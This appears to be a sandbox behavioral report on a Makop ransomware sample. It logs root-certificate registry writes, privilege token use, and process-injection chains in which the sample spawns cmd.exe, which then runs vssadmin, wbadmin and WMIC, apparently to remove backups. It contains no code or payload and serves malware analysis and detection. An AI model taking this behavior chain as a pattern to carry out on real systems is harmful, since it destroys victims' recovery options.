Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2080 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2080 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2080 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2080 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2080 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2812 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Windows\system32\cmd.exe
PID 2812 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Windows\system32\cmd.exe
PID 2812 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Windows\system32\cmd.exe
PID 2812 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Windows\system32\cmd.exe
PID 2656 wrote to memory of 3036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2656 wrote to memory of 3036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2656 wrote to memory of 3036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2656 wrote to memory of 396 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 2656 wrote to memory of 396 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 2656 wrote to memory of 396 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 2656 wrote to memory of 2916 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2656 wrote to memory of 2916 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2656 wrote to memory of 2916 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1800 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1800 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1800 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1800 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1800 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2756 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2756 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2756 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2756 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2756 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1968 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1968 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1968 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1968 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1968 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1772 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1772 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1772 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1772 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1772 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1704 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1704 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1704 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1704 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1704 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2700 wrote to memory of 1364 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2700 wrote to memory of 1364 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2700 wrote to memory of 1364 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
